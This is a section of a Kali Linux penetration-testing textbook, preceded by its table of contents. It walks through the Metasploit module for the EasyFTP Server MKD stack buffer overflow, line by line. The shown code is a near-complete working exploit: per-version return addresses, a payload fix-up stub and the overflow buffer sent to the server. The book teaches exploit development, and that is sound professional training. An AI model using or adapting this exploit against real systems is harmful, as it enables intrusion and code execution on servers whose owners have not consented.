Table of Contents for
Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition

Version ebook / Retour

Cover image for bash Cookbook, 2nd Edition Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition by Gerard Johansen Published by Packt Publishing, 2016
  1. Cover
  2. Table of Contents
  3. Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
  4. Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
  5. Credits
  6. Disclaimer
  7. About the Authors
  8. About the Reviewer
  9. www.PacktPub.com
  10. Preface
  11. What you need for this book
  12. Who this book is for
  13. Conventions
  14. Reader feedback
  15. Customer support
  16. 1. Beginning with Kali Linux
  17. Kali Linux tool categories
  18. Downloading Kali Linux
  19. Using Kali Linux
  20. Configuring the virtual machine
  21. Updating Kali Linux
  22. Network services in Kali Linux
  23. Installing a vulnerable server
  24. Installing additional weapons
  25. Summary
  26. 2. Penetration Testing Methodology
  27. Vulnerability assessment versus penetration testing
  28. Security testing methodologies
  29. General penetration testing framework
  30. Information gathering
  31. The ethics
  32. Summary
  33. 3. Target Scoping
  34. Preparing the test plan
  35. Profiling test boundaries
  36. Defining business objectives
  37. Project management and scheduling
  38. Summary
  39. 4. Information Gathering
  40. Using public resources
  41. Querying the domain registration information
  42. Analyzing the DNS records
  43. Getting network routing information
  44. Utilizing the search engine
  45. Metagoofil
  46. Accessing leaked information
  47. Summary
  48. 5. Target Discovery
  49. Identifying the target machine
  50. OS fingerprinting
  51. Summary
  52. 6. Enumerating Target
  53. Understanding the TCP/IP protocol
  54. Understanding the TCP and UDP message format
  55. The network scanner
  56. Unicornscan
  57. Zenmap
  58. Amap
  59. SMB enumeration
  60. SNMP enumeration
  61. VPN enumeration
  62. Summary
  63. 7. Vulnerability Mapping
  64. Vulnerability taxonomy
  65. Automated vulnerability scanning
  66. Network vulnerability scanning
  67. Web application analysis
  68. Fuzz analysis
  69. Database assessment tools
  70. Summary
  71. 8. Social Engineering
  72. Attack process
  73. Attack methods
  74. Social Engineering Toolkit
  75. Summary
  76. 9. Target Exploitation
  77. Vulnerability and exploit repositories
  78. Advanced exploitation toolkit
  79. MSFConsole
  80. MSFCLI
  81. Ninja 101 drills
  82. Writing exploit modules
  83. Summary
  84. 10. Privilege Escalation
  85. Password attack tools
  86. Network spoofing tools
  87. Network sniffers
  88. Summary
  89. 11. Maintaining Access
  90. Working with tunneling tools
  91. Creating web backdoors
  92. Summary
  93. 12. Wireless Penetration Testing
  94. Wireless network recon
  95. Wireless testing tools
  96. Post cracking
  97. Sniffing wireless traffic
  98. Summary
  99. 13. Kali Nethunter
  100. Installing Kali Nethunter
  101. Nethunter icons
  102. Nethunter tools
  103. Third-party applications
  104. Wireless attacks
  105. HID attacks
  106. Summary
  107. 14. Documentation and Reporting
  108. Types of reports
  109. The executive report
  110. The management report
  111. The technical report
  112. Network penetration testing report (sample contents)
  113. Preparing your presentation
  114. Post-testing procedures
  115. Summary
  116. A. Supplementary Tools
  117. Web application tools
  118. Network tool
  119. Summary
  120. B. Key Resources
  121. Paid incentive programs
  122. Reverse engineering resources
  123. Penetration testing learning resources
  124. Exploit development learning resources
  125. Penetration testing on a vulnerable environment
  126. Online web application challenges
  127. Virtual machines and ISO images
  128. Network ports
  129. Index

Writing exploit modules

Developing an exploit is one of the most interesting aspects of the Metasploit framework. In this section, we will briefly discuss the core issues surrounding the development of an exploit, and explain its key skeleton by taking a live example from the existing framework's database. However, it is important to be adept with the Ruby programming language before you attempt to write your own exploit module. On the other hand, intermediate skills of reverse engineering and practical understanding of vulnerability discovery tools (for example, fuzzers and debuggers) provide an open map towards the exploit construction. This section is meant only as an introduction to the topic, and not a complete guide.

For our example, we have selected the exploit (EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow), which will provide a basic view of exploiting buffer overflow vulnerability in the Easy FTP Server application. You can port this module for a similar vulnerability found in other FTP server applications and thus, utilize your time effectively. The exploit code is located at /usr/share/metasploit-framework/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb.

##
# $Id: easyftp_mkd_fixret.rb 9935 2010-07-27 02:25:15Z jduck $
##

The preceding code is a basic header representing a filename, a revision number, and the date and time values of an exploit.

The next part of the exploit identifies itself as part of the Metasploit Framework:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

The MSF core library requires an initialization at the beginning of an exploit:

class Metasploit3 <Msf::Exploit::Remote

In the preceding code, the Exploitmixin/ class is the one that provides various options and methods for the remote TCP connections such as RHOST, RPORT, Connect(), Disconnect(), and SSL().

The code is then given a rank level assigned to the exploit on the basis of its frequent demand and usage:

Rank = GreatRanking

In the code, the Ftp mixin/ class establishes a connection with the FTP server:

includeMsf::Exploit::Remote::Ftp

The code provides generic information about the exploit and points to known references:

def initialize(info = {})
super(update_info(info,
      'Name'           => 'EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which
leads to a stack based buffer overflow.

        NOTE: EasyFTP allows anonymous access by default. However, in order to access the
        'MKD' command, you must have access to an account that cancreate directories.

        After version 1.7.0.12, this package was renamed "UplusFtp".

        This exploit utilizes a small piece of code that I've referred to as 'fixRet'.
        This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by
        'fixing' the return address post-exploitation.  See references for more information.
      },
      'Author'         =>
        [
          'x90c',   # original version
          'jduck'   # port to metasploit / modified to use fix-up stub (works with bigger payloads)
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9935 $',
      'References'     =>
        [
[ 'OSVDB', '62134' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12044/' ],
[ 'URL', 'http://www.exploit-db.com/exploits/14399/' ]
        ],

The next part of the code instructs the payload to clean up itself once the execution process is completed:

'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'

The following code snippet defines 512 bytes of space available for the shellcode, lists bad characters that should terminate our payload delivery, and disables the NOP padding:

},
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 512,
          'BadChars' => "\x00\x0a\x0d\x2f\x5c",
          'DisableNops' => true
        },

The next code snippet provides instructions on what platform is being targeted and defines the vulnerable targets (0 to 9) that list the different versions of Easy FTP Server (1.7.0.2 to 1.7.0.11), each representing a unique return address based on the application binary (ftpbasicsvr.exe). Furthermore, the exploit disclosure date was added, and the default target was set to 0 (v1.7.0.2):

'Platform'       => 'win',
      'Targets'        =>
        [
[ 'Windows Universal - v1.7.0.2',   { 'Ret' =>0x004041ec } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.3',   { 'Ret' =>0x004041ec } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.4',   { 'Ret' =>0x004041dc } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.5',   { 'Ret' =>0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.6',   { 'Ret' =>          0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.7',   { 'Ret' =>0x004041a1 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.8',   { 'Ret' =>0x00404481 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.9',   { 'Ret' =>0x00404441 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.10',  { 'Ret' =>0x00404411 } ], # call ebp - from ftpbasicsvr.exe
[ 'Windows Universal - v1.7.0.11',  { 'Ret' =>0x00404411 } ], # call ebp - from ftpbasicsvr.exe
        ],
      'DisclosureDate' => 'Apr 04 2010',
      'DefaultTarget' => 0))

The check() function determines whether the target is vulnerable:

end

def check
connect
disconnect

if (banner =~ /BigFoolCat/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

The next section of code defines a function that generates NOP sleds to aid with IDS/IPS/AV evasion. Some consider NOP sleds to be a quick and dirty solution to this problem and that they should not be used unless there is a particularly good reason. For simplicity, during this example of writing a module, we have left the function in the code:

defmake_nops(num); "C" * num; end

The next procedure fixes a return address from where the payload can be executed. Technically, it resolves the issue of stack addressing:

def exploit
connect_login

    # NOTE:
    # This exploit jumps to ebp, which happens to point at a partial version of
    # the 'buf' string in memory. The fixRet below fixes up the code stored on the
    # stack and then jumps there to execute the payload. The value inesp is used
    # with an offset for the fixup.
fixRet_asm = %q{
movedi,esp
subedi, 0xfffffe10
mov [edi], 0xfeedfed5
addedi, 0xffffff14
jmpedi
    }
fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string

buf = ''

Initially, the exploit buffer holds the encoded return address and the randomized NOP instructions:

print_status("Prepending fixRet...")
buf<<fixRet
buf<<make_nops(0x20 - buf.length)

This portion of the code adds a dynamically generated shellcode to our exploit at runtime:

print_status("Adding the payload...")
buf<<payload.encoded

At the end, using the the following code, we send our finalized buffer to the specific target using the vulnerable MKD FTP post-authentication command. Since the MKD command in the Easy FTP Server is vulnerable to stack-based buffer overflow, the command buf will overflow the target stack, and exploit the target system by executing our payload:

    # Patch the original stack data into the fixer stub
buf[10, 4] = buf[268, 4]

print_status("Overwriting part of the payload with target address...")
buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes

The preceding code fixes the stack data and makes a short jump over the return address holding our shellcode buffer.

print_status("Sending exploit buffer...")
send_cmd( ['MKD', buf] , false)

Close your connections using the following code:

handler
disconnect
end

end

Note

Metasploit is equipped with useful tools such as msfpescan for Win32 and msfelfscan for Linux systems that may assist you in finding a target-specific return address. For instance, to find a sustainable return address from your chosen application file, type # msfpescan -p targetapp.ext.